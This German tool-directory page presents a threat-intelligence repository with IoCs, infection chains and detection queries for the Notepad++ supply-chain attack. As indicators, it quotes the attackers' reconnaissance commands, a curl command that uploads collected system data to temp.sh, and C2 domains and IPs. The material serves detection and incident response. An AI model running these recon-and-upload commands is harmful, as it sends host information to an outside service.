Skip to content
KitploitKITPLOIT
ToolsBlog
Log in
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
notepadpp-supply-chain-iocs — IoCs und Erkennungsregeln für den Notepad++ Supply-Chain-Angriff (CVE-2025-15556) — Lotus Blossom APT, Juni–Dezember 2025. Beinhaltet Falcon LogScale-Abfragen, YARA/Sigma-Regeln und MITRE ATT&CK Mapping. | Kitploit
Tools/GitHubGitHub/renat0z3r0/notepadpp-supply-chain-iocs
Management von Indicators of Compromise (IOC)Bedrohungsfeeds & AggregatorenSchwachstellenanalyseForensikMalware-AnalyseBedrohungsanalyseLieferkettensicherheitLernen & BildungIncident Response

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
GitHubrenat0z3r0/notepadpp-supply-chain-iocs

notepadpp-supply-chain-iocs

IoCs und Erkennungsregeln für den Notepad++ Supply-Chain-Angriff (CVE-2025-15556) — Lotus Blossom APT, Juni–Dezember 2025. Beinhaltet Falcon LogScale-Abfragen, YARA/Sigma-Regeln und MITRE ATT&CK Mapping.

Repository anzeigen
119vor 7 MonatenNoch nicht geprüft
Teilen

Notepad++ Supply-Chain-Angriff — IoC-Repository

CVE-2025-15556 | Lotus Blossom / Raspberry Typhoon | Juni – Dezember 2025

Last Updated IoC Count License: MIT MITRE ATT&CK


Überblick

Dieses Repository enthält eine umfassende, konsolidierte Sammlung von Indikatoren für Kompromittierung (IoCs) im Zusammenhang mit dem Notepad++-Supply-Chain-Angriff, der am 2. Februar 2026 offengelegt wurde.

Zwischen Juni und Dezember 2025 kompromittierte ein chinesischer staatlich geförderter Bedrohungsakteur die Hosting-Infrastruktur von Notepad++, kaperte den integrierten Update-Mechanismus (WinGUp) und lieferte selektiv trojanisierte Installer an gezielte Benutzer aus. Der Angriff nutzte das Fehlen einer kryptografischen Prüfung im Updater (vor v8.8.9) aus und ermöglichte die Verteilung von individuellen Backdoors, Cobalt Strike Beacons und Metasploit-Payloads.

Wichtige Fakten

CVECVE-2025-15556 — Herunterladen von Code ohne Integritätsprüfung
BedrohungsakteurLotus Blossom (Bilbug, Raspberry Typhoon, Thrip) / Zirconium (Violet Typhoon)
Aktiver ZeitraumJuni 2025 – 2. Dezember 2025
AngriffsvektorSupply-Chain-Kompromittierung über den WinGUp-Autoupdater
ZieleRegierung, Telekommunikation, Finanzdienstleistungen, IT-Dienstleister (Philippinen, Vietnam, El Salvador, Australien, Ostasien)
MalwareChrysalis-Backdoor (eigen entwickelt), Cobalt Strike Beacon, Metasploit Meterpreter
Behoben inNotepad++ v8.8.9+ (Zertifikatsprüfung) / v8.9.1+ (XMLDSig-Validierung)

Infektionsketten

Kaspersky GReAT identifizierte drei unterschiedliche Infektionsketten, die etwa monatlich rotiert wurden, um der Erkennung zu entgehen:

Kette #1 — Juli/August 2025

GUP.exe → update.exe (NSIS) → ProShow.exe (legitim) → Exploit über „load"-Datei
  → Metasploit-Downloader → Cobalt Strike Beacon
  • Nutzt eine alte Schwachstelle in der ProShow-Software anstelle von DLL-Sideloading
  • Aufklärung: whoami && tasklist → exfiltriert über temp.sh
  • Arbeitsverzeichnis: %appdata%\ProShow\

Kette #2 — September/Oktober 2025

GUP.exe → update.exe (NSIS) → script.exe (Lua-Interpreter) → alien.ini (kompiliertes Lua)
  → Shellcode über EnumWindowStationsW → Metasploit-Downloader → Cobalt Strike Beacon
  • Verwendet einen legitimen Lua-Interpreter zur Ausführung von kompiliertem Shellcode
  • Erweiterte Aufklärung: whoami && tasklist && systeminfo && netstat -ano
  • Arbeitsverzeichnis: %appdata%\Adobe\Scripts\

Kette #3 — Oktober 2025

GUP.exe → update.exe (NSIS) → BluetoothService.exe (legitim) → log.dll (gesideloadet)
  → entschlüsselt „BluetoothService"-Shellcode → Chrysalis-Backdoor
  • Klassische DLL-Sideloading-Technik
  • Keine integrierte Aufklärung (anders als bei Kette 1 und 2)
  • Arbeitsverzeichnis: %appdata%\Bluetooth\
  • Zugehöriger Cobalt Strike Beacon gefunden in C:\ProgramData\USOShared\
                     ┌─────────────────────────────────────────────────────────┐
                     │              KOMPROMITTIERUNGS-ZEITSTRAHL                │
                     ├─────────┬─────────┬─────────┬─────────┬─────────┬──────┤
                     │  Jul 25 │  Aug 25 │  Sep 25 │  Okt 25 │  Nov 25 │Dez 25│
                     ├─────────┴─────────┴─────────┴─────────┴─────────┴──────┤
  Kette #1 (ProShow) │████████████████████                                    │
  Kette #2 (Lua)     │                    █████████████████████████████        │
  Kette #3 (DLL SL)  │                              ██████████████            │
  Infra-Zugriff      │████████████████████████████████████████████████████████│
                     └────────────────────────────────────────────────────────┘

Repository-Inhalte

DateiBeschreibung
notepadpp_supply_chain_iocs.csvVollständiger IoC-Datensatz (105 Indikatoren) mit MITRE ATT&CK-Zuordnung

CSV-Schema

SpalteBeschreibung
ioc_typeTyp: ip, domain, url, sha1, sha256, filepath, filename, useragent, behavior, cve, attribution, compromise_window
ioc_valueDer Indikatorwert
chainInfektionskette (1, 2, 3, 1/2, 2/3, all, n/a)
contextBeschreibung, wofür der IoC steht
sourceNachrichtenquelle (Kaspersky, Rapid7, CrowdStrike, Tenable, Kevin Beaumont)
riskSchweregrad (CRITICAL, HIGH, MEDIUM, LOW, INFO)
mitre_techniqueMITRE ATT&CK-Technik-ID

Erkennung & Bedrohungsjagd

Prioritätsindikatoren (hier beginnen)

Verhaltensbasiert – IoC-agnostisch, höchster Wert:

  • gup.exe startet einen untergeordneten Prozess, der kein legitimer signierter Notepad++-Installer ist
  • gup.exe stellt Verbindungen zu Domains/IPs her, die nicht notepad-plus-plus.org, github.com, release-assets.githubusercontent.com sind
  • Erstellung von Verzeichnissen: %appdata%\ProShow\, %appdata%\Adobe\Scripts\, %appdata%\Bluetooth\
  • Erstellung von %localappdata%\Temp\ns.tmp\ (NSIS-Laufzeit – in allen Ketten vorhanden)

Netzwerk – hohe Zuversicht:

  • DNS-Auflösung von cdncheck.it.com, safe-dns.it.com, self-dns.it.com, api.skycloudcenter.com, api.wiresguard.com
  • Verbindungen zu temp.sh (51.91.79.17) – insbesondere mit Dateiupload über curl
  • HTTP-Anfragen mit temp.sh-URLs im User-Agent-Header
  • Ausgehende Verbindungen zu 45.76.155.202, 45.32.144.255, 95.179.213.0, 45.77.31.210

Aufklärungsbefehle (nach Exploitation):

cmd /c whoami&&tasklist > 1.txt
cmd /c "whoami&&tasklist&&systeminfo&&netstat -ano" > a.txt
curl -F "[email protected]" -s https://temp.sh/upload

CrowdStrike Falcon LogScale-Abfragen

Verhaltensbasiert: Jagd auf GUP.exe-Unterprozesse
#event_simpleName=ProcessRollup2 event_platform=Win ParentBaseFileName="gup.exe"
| FilePath=/\\Device\\HarddiskVolume\d+(?<shortFilePath>.+$)/
| groupBy([FileName, SHA256HashData, shortFilePath, CommandLine])
Multi-IoC-Jagd über Prozess-, Netzwerk- und DNS-Ereignisse
Tool herunterladen